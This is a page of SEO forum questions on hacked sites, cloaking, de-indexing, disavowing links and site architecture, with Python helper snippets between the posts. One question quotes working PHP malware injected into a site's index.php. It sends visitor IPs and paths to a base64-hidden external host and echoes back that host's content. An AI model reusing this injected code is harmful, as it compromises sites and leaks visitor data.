Hacked site vs No site
-
So I have this website that got hacked with cloaking, and Google has labeled it as such in the SERPs, with due reason of course. My question: I am going to relaunch an entirely new, redesigned website in less than 30 days. Do I pull the hacked site down until then, or leave it up? Which option is better?
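Cloaking means the hacked pages serve different content to search-engine crawlers than to regular visitors. One way to see what Google is flagging is to fetch the same URL with a crawler user agent and a browser user agent and compare the responses. A minimal Python sketch; the user-agent strings and the 0.9 similarity threshold are illustrative assumptions, not anything from this thread:

```python
# Hypothetical cloaking check: fetch a page as a search-engine bot and as a
# browser, then compare the two HTML payloads. A sharp divergence suggests
# the server is serving crawler-specific (cloaked) content.
import difflib
import urllib.request

GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

def fetch(url: str, user_agent: str) -> str:
    """Fetch a URL while presenting the given User-Agent header."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", errors="replace")

def similarity(html_a: str, html_b: str) -> float:
    """Return a 0..1 similarity ratio between two HTML payloads."""
    return difflib.SequenceMatcher(None, html_a, html_b).ratio()

def looks_cloaked(html_bot: str, html_browser: str, threshold: float = 0.9) -> bool:
    """Flag the page if the bot and browser versions diverge sharply."""
    return similarity(html_bot, html_browser) < threshold
```

Usage would be something like `looks_cloaked(fetch(url, GOOGLEBOT_UA), fetch(url, BROWSER_UA))`; dynamic ads or personalization can lower the ratio too, so treat a flag as a prompt to inspect, not proof.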
-
Hi Rich,
I cleaned up a client's site using a method similar to what Dirk described. The developer kept the site exactly the same, removed the infected areas and then let Google know. The vulnerability was in an old plugin.
It took 24 hours for the 'this website may be hacked' label to be removed by Google. I don't think it is as dire as you think, as long as you have a competent developer.
-
According to Google you should put your site in quarantine (serve a 503 status) and make it available again once it's cleaned (in your case, relaunched). Source: https://support.google.com/webmasters/answer/2600719?hl=en.
Personally, I would also consider the option of cleaning your current site: 3-4 weeks is a very long time offline and it could have a negative impact on your rankings.
Dirk
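The quarantine Google describes can be as simple as answering every request with a 503 and a Retry-After header until the relaunch, so crawlers treat the outage as temporary rather than deindexing pages or indexing the hacked content. A minimal stand-in sketch using Python's built-in http.server; the port and retry interval are arbitrary assumptions:

```python
# Sketch of a "quarantine" server: every URL returns 503 Service Unavailable
# plus a Retry-After header, signalling a temporary outage to crawlers.
from http.server import BaseHTTPRequestHandler, HTTPServer

MAINTENANCE_HTML = b"<html><body><h1>Down for maintenance</h1></body></html>"

class QuarantineHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(503)                       # temporarily unavailable
        self.send_header("Retry-After", "86400")      # suggest retrying in ~1 day
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(MAINTENANCE_HTML)))
        self.end_headers()
        self.wfile.write(MAINTENANCE_HTML)

    def log_message(self, *args):                     # keep the demo quiet
        pass

def run_quarantine_server(port: int = 8080) -> None:
    """Serve 503s on every request until the cleanup or relaunch is done."""
    HTTPServer(("", port), QuarantineHandler).serve_forever()
```

In practice you would configure this at the web server (Apache/nginx) rather than run a separate process; the point is the status code and header, not the server.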
Related Questions
-
Infinite Scrolling on Publisher Sites - is VentureBeat's implementation really SEO-friendly?
I've just begun a new project auditing the site of a news publisher. In order to increase pageviews and thus advertising revenue, at some point in the past they implemented something so that as many as 5 different articles load per article page. All articles are loaded at the same time, and from looking at Google's cache and the errors flagged in Search Console, Google treats it as one big mass of content, not separate pages. Another thing to note: when a user scrolls down, the URL does in fact change when you get to the next article.

My initial thought was to remove this functionality and just load one article per page. However, I happened to notice that VentureBeat.com uses something similar. They use infinite scrolling so that the other articles on the page (in a 'feed' style) only load when a user scrolls to the bottom of the first article. I checked Google's cached versions of the pages and it seems that Google also only reads the first article, which seems like an ideal solution. This obviously has the additional benefit of speeding up page load time.

My question is: is VentureBeat's implementation actually that SEO-friendly or not? VentureBeat have 'sort of' followed Google's guidelines on implementing infinite scrolling (https://webmasters.googleblog.com/2014/02/infinite-scroll-search-friendly.html) by using prev and next tags for pagination (https://support.google.com/webmasters/answer/1663744?hl=en). However, isn't the point of pagination to list multiple pages in a series (i.e. page 2, page 3, page 4, etc.) rather than just other related articles? Here's an example: http://venturebeat.com/2016/11/11/facebooks-cto-explains-social-networks-10-year-mission-global-connectivity-ai-vr/

Would be interesting to know if someone has dealt with this first-hand or just has an opinion. Thanks in advance! Daniel
White Hat / Black Hat SEO | | Daniel_Morgan1 -
Competitors Linking to My Site
One of the more successful competitors in my niche has embarked on a new strategy that seems to be working well for him. I noticed that many new links began to appear to my site from my competitor's stable of many websites. It appears that he has set up a link wheel to benefit a site that has been in the top Google position for several months now. The rim of the wheel links back to authority sites, including my own main site (established 7 years, now hanging on to a lowly 10th place on the SERP).

So the strategy seems to be: a) create a dozen sites that nofollow-link back to authority sites, including competitors; b) place the links in such a manner (bottom of page, uncolored links, from images) that a customer is unlikely to ever click on them; c) dofollow-link to your own site and blast it to the top of Google.

I don't think this competitor is worried about getting penalized. I've been watching this for years. When one site gets burned, he just shifts things around and brings up another one of his sites. He seems to age them for years, calling them up one by one as they are needed. Has anyone else noticed this? Is it a trend? Because it sure seems to work. He's crowded the front page now with 4 of his sites. Would it be appropriate for me to "disavow" his links? Would it matter?
White Hat / Black Hat SEO | | DarrenX0 -
Site De-Indexed except for Homepage
Hi Mozzers,

Our site has suddenly been de-indexed from Google and we don't know why. All pages are de-indexed in Google Webmaster Tools (except for the homepage and sitemap), starting after 7 September. Please see the screenshot attached to show this:

7 Sept 2014: 76 pages indexed in Google Webmaster Tools
28 Sept until current: 3-4 pages indexed in Google Webmaster Tools, including homepage and sitemaps

Site is: (removed)

As a result, all rankings for child pages have also disappeared in Moz Pro Rankings Tracker. Only the homepage is still indexed and ranking. It seems like a technical issue blocking the site. I checked robots.txt, noindex, nofollow and canonical tags, and ran a site crawl for 404 errors, but can't find anything. The site is online and accessible. No warnings or errors appear in Google Webmaster Tools.

One recent change is that we moved from a shared to a dedicated server around 7 Sept (same host and location). Prior to the move our preferred domain was www.domain.com WITH www. However, during the move they set our domain as domain.tld WITHOUT the www. Running a site:domain.tld vs site:www.domain.tld command now finds pages indexed under the non-www version, but no longer under the www version. Could this be a cause of the de-indexing? Yesterday we had our host reset the domain to use www again and we resubmitted our sitemap, but there is no change yet to the indexing.

What else could be wrong? Any suggestions appreciated. Thanks.

White Hat / Black Hat SEO | | emerald
-
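For on-page checks like the ones described in the de-indexing question above (stray noindex tags, or canonicals pointing at the wrong hostname after a www/non-www switch), a small script can scan each page instead of spot-checking by hand. A sketch using only the Python standard library; the domain.tld / www.domain.tld names follow the placeholders in the question:

```python
# Scan a page's HTML for two common silent de-indexing causes:
# 1) a robots meta tag containing "noindex"
# 2) a rel="canonical" URL whose host differs from the expected host
#    (e.g. canonical says domain.tld while the site should be www.domain.tld)
from html.parser import HTMLParser
from urllib.parse import urlparse

class IndexabilityParser(HTMLParser):
    def __init__(self):
        super().__init__()
        self.noindex = False
        self.canonical = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and a.get("name", "").lower() == "robots":
            if "noindex" in a.get("content", "").lower():
                self.noindex = True
        if tag == "link" and a.get("rel", "").lower() == "canonical":
            self.canonical = a.get("href")

def check_page(html: str, expected_host: str):
    """Return (has_noindex, canonical_points_elsewhere) for one page."""
    p = IndexabilityParser()
    p.feed(html)
    mismatch = bool(p.canonical) and urlparse(p.canonical).netloc != expected_host
    return p.noindex, mismatch
```

Run over every URL in the sitemap, any (True, _) or (_, True) result is a page worth investigating.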
Rank drop ecommerce site
Hello, We're going to get an audit, but I would like to hear some ideas on what could have caused our ranking drop. There are no warnings in GWT.

We deleted 17 or so blogs (that had no backlinks pointing to them and existed simply for easy links) last summer, thinking that they weren't white hat so we had to start eliminating them. At the same time, we eliminated a few sitewide paid links that were really strong. With all of this deletion, our keywords started to drop. For example, our main keyword went from first to third/fourth. With the deletions, our keywords immediately dropped a couple of spots; then, with no more deletions, all of our keywords have been slowly dropping over the last seven months or so. Right now we are at the bottom of the first page for that same main keyword, and other keywords look similar.

We have 70 linking root domains, of which: 15 are blogs with no backlinks that were created simply for the purpose of easy links (we didn't delete them all yet because of the immediate ranking drop when we deleted the last ones). One PR5 site links to our home page scattered throughout its lists of resources for people in different states in the US; it doesn't look like a standard paid-link site, but it has many paid links on its different pages. One PR4 site has our logo alongside another paid-link logo at the bottom of one of its pages. There are 2 other paid links from two PR4 sites that look editorial; there are other paid links on those sites to other websites, but all links on those 2 sites look editorial. That's all the bad stuff.

Other things that could be causing the drop in rank:

Our breadcrumbs are kind of messed up. We have a lot of subcategory pages that rel=canonical to main categories in the menu. We did this because we had categories that were exactly the same, so you'll drill down on a category page and end up on a main category. To the average user, it seems perfectly fine.
Our on-site SEO still has a few pages that repeat words in the titles and h1 tags several times (especially our #1 main keyword), with titles similar to something like: running shoes | walking shoes | cross-training shoes, where a word is repeated 2 or 3 times. Also, there are a few pages that are more keyword-stuffed than we would like in the content: just a couple of paragraphs, but 2 keywords are each dispersed in them three times. The keywords in this content are not in different variations; they're exactly the keyword. We've still got a few URLs that are stuffed with around 3 different keywords.
We may have many 404 errors (due to some mistakes we made with the URLs in our cart); if Google hasn't deindexed them all, then we could have dozens of 404s on important category pages. But nothing is showing up in GWT, and our sitemap does not include any broken links.
Google seems confused about our branding. I'm adding branding to the on-site SEO, but right now Google often shows keywords as our branding when it rewrites the way the title tag is displayed in the search results.
We don't link out to anyone. We have lots of content, almost no duplicate content, and some authoritative, very comprehensive articles. Your thoughts on what to do to get our rankings back up?
White Hat / Black Hat SEO | | BobGW0 -
Website has been hacked will this hurt ranking
Today we found out that one of our websites has been hacked, with the following code inserted into multiple index.php files:

<?php
if (!isset($sRetry))
{
    global $sRetry;
    $sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
            $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink );
        }
    }
    if ( $stCurlHandle !== NULL )
    {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
        $sResult = @curl_exec($stCurlHandle);
        if ($sResult[0]=="O")
        {
            $sResult[0]=" ";
            echo $sResult; // Statistic code end
        }
        curl_close($stCurlHandle);
    }
}
?>

After some searching I found other people mentioning this problem too. They were also saying that it could have an impact on your search rankings.

My first question: will this hurt my rankings?
Second question: is there something I can do to tell the search engines about the hack so that we don't lose ranking because of it?

Grtz, Ard

White Hat / Black Hat SEO | | GTGshops
-
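For anyone triaging injected code like the snippet in the question above: the base64_decode() call is how it hides its phone-home URL from a casual grep for suspicious domains. Decoding the string (shown here in Python rather than PHP, purely for illustration) reveals the endpoint the "bot analytics" request is sent to:

```python
# Malware droppers often store their command/collection URL as base64 so a
# plain-text search of the codebase finds no suspicious domain names.
# Decoding the blob from the injected snippet exposes the hidden endpoint.
import base64

def decode_hidden_string(encoded: str) -> str:
    """Decode a base64 blob like the one passed to base64_decode() above."""
    return base64.b64decode(encoded).decode("utf-8")

hidden = "aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw"
print(decode_hidden_string(hidden))  # → http://mbrowserstats.com/statH/stat.php
```

Decoding every base64 literal found during cleanup is a quick way to inventory where a compromised site was reporting to, and which domains to block at the firewall.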
Untrusted site - malware!
I recently had my link profile audited, as I was badly affected by something in 2012 (Penguin, Panda... who knows? I never got a message from Google in Webmaster Tools about anything). Loads of INBOUND links were identified as being 'dodgy' and the auditor highlighted them in different colors. However, another SEO expert told me to leave them (perhaps remove just 3 of them) and not bother with the rest. Now I am not sure what to do. Any opinions?

RED: 3 were highlighted as being from untrusted malware sites. I think I should disavow them, but really, would 3 make that much difference for a fall in my site?

ORANGE: 240 were said to be spam articles, and I was advised: "The following pages highlighted in orange are on sites created for the purpose of publishing articles for link building. Since the same articles appear on multiple sites, Google views this as duplicate content. Links to Monteverde Tours in these articles should be removed or tagged 'nofollow.' Where this is not possible, the domains should be disavowed."

YELLOW: 85 were said to be from low-quality directories: "The following pages highlighted in yellow are on low-quality directories and link farms. Links to Monteverde Tours on these pages should be removed or the domains disavowed."

GREEN: 340 were said to be from pages that were not found, accounts suspended, pages with loading problems, links removed, or expired domains: "The following pages highlighted in green include pages whose links to Monteverde Tours have been removed and pages that were inaccessible for various reasons, as shown in the Comments column. These pages or their domains should be disavowed to remove them from the Google index."

I have read (and asked on this forum) about disavowal, but the more I read the more confused I get about the next action. I tried for one year to get rid of any bad outbound links, did blogging, social media, improved content, landing pages etc., but all to no avail. Any opinions appreciated. I am not looking for a magic bullet, I know there isn't one. I know I need to keep improving content etc., but after a year of NO improvements should I consider the link removal route?

White Hat / Black Hat SEO | | Llanero
-
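If the disavow route is taken for the audit described above, Google's disavow tool accepts a plain text file with one `domain:example.com` entry or full URL per line, plus `#` comment lines. A small sketch that assembles such a file; the domain names are made-up placeholders, not the actual audited links:

```python
# Sketch of building a disavow file in the text format Google's disavow
# tool accepts: "#" comments, "domain:host" lines to disavow every link
# from a host, and bare URLs to disavow individual pages.
def build_disavow_file(domains, urls=(), note=""):
    """Return the text of a disavow file for the given domains and URLs."""
    lines = []
    if note:
        lines.append(f"# {note}")
    lines += [f"domain:{d}" for d in domains]   # drop every link from these hosts
    lines += list(urls)                         # drop only these specific pages
    return "\n".join(lines) + "\n"

text = build_disavow_file(
    ["spam-directory.example", "linkfarm.example"],
    urls=["http://articles.example/duplicate-post.html"],
    note="Links flagged red/yellow/green in the audit",
)
print(text)
```

Generating the file from the audit spreadsheet keeps the red/yellow/green categories traceable in the comments, and domain-level entries are usually safer than listing hundreds of individual URLs from the same link farm.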
HELP - Site architecture of E-Commerce Mega Menu - Linkjuice flow
Hi everyone, I hope you have a couple of mins to give me your opinion. The ecommerce site has around 2,000 products, in English and Spanish, and around only 70 hits per day, if that. We have done a lot of optimisation on the site: page titles, URLs, content, H1s, etc. Everything on-page is pretty much under control, except I am starting to realise the site architecture could be harming our SEO efforts.

Once someone arrives on site they are language-detected and 302-redirected to either domain.com/EN or domain.com/ES depending on their preferred language. Then on the homepage we have the big MEGA MENU, structured like:

CAT 1
  SubCat 1
    SubsubCat 1
    SubsubCat 2
    SubsubCat 3

Overall, there are 145 "categories", plus links to some CMS pages like Home, Delivery terms, etc. Each main category contains the products of everything related to that category, so for example:

KITCHENWARE
  COOKWARE
    SAUCEPANS
    FRYING PANS
  BAKINGWARE
    BOWLS

Kitchenware contains ALL PRODUCTS OF THE SUBCATS BELOW (cookware items, saucepans, frying pans, bakingware, etc.), plus links to those categories through breadcrumbs and a left-hand nav, in addition to the mega menu above. So once the bots hit the site, immediately they have this structure to deal with.

Here is what the stats look like:

Domain Authority: 18

www.domain.com/EN/ — PA: 27, mR: 3.99, mT: 4.90
www.domain.com/EN/CAT 1 — PA: 15, mR: 3.05, mT: 4.54
www.domain.com/EN/CAT 1/SUBCAT1 — PA: 15, mR: 3.05, mT: 4.54

Product pages themselves have a PA of 1 and no mR or mT.

I really need some other opinions here. I am thinking of: removing links in the nav menu so it only contains CAT1 and SUBCAT1 but deleting the SUBSUBCATS1, which represent around 80 links; and removing products from the CAT1 page, e.g. CAT 1 would "tile" graphical links to subcategories but not display products themselves, so products are only available at the lowest part of the chain (which will be shortened).

But I am willing to hear any other ideas please. Maybe another alternative is to start building links to boost DA and linkjuice? Thanks all, Ben

White Hat / Black Hat SEO | | bjs2010
-
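As a rough way to reason about the menu-trimming idea in the question above: in a simplified PageRank-style model (a deliberate simplification for intuition, not how Google actually computes anything), a page divides its outgoing link equity evenly across its links, so cutting the mega menu from 145 links to around 65 roughly doubles what each remaining category page receives:

```python
# Hypothetical even-split model of "linkjuice": a page passes its outgoing
# equity divided equally among its links, so fewer sitewide links means
# more equity per remaining link. Purely illustrative numbers.
def equity_per_link(page_equity: float, outgoing_links: int) -> float:
    """Equity passed to each linked page under an even-split model."""
    return page_equity / outgoing_links

before = equity_per_link(1.0, 145)   # full mega menu on every page
after = equity_per_link(1.0, 65)     # SubsubCats removed (~80 fewer links)
print(f"{after / before:.2f}x more equity per remaining link")  # → 2.23x
```

Real ranking systems damp and iterate this rather than splitting once, but the direction of the effect is the same: a flatter, smaller sitewide menu concentrates internal authority on the categories that remain.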
Do sitewide links from other sites hurt SEO?
A friend of mine has a PageRank 3 website that links to all the pages on my site from every page of his site. The anchor text of each of these links is the title of the page it links to. Does this hurt SEO? I can have him change the links to whatever I want, so if it does hurt, what should I change the anchor text to? Thanks mozzers! Ron
White Hat / Black Hat SEO | | Ron100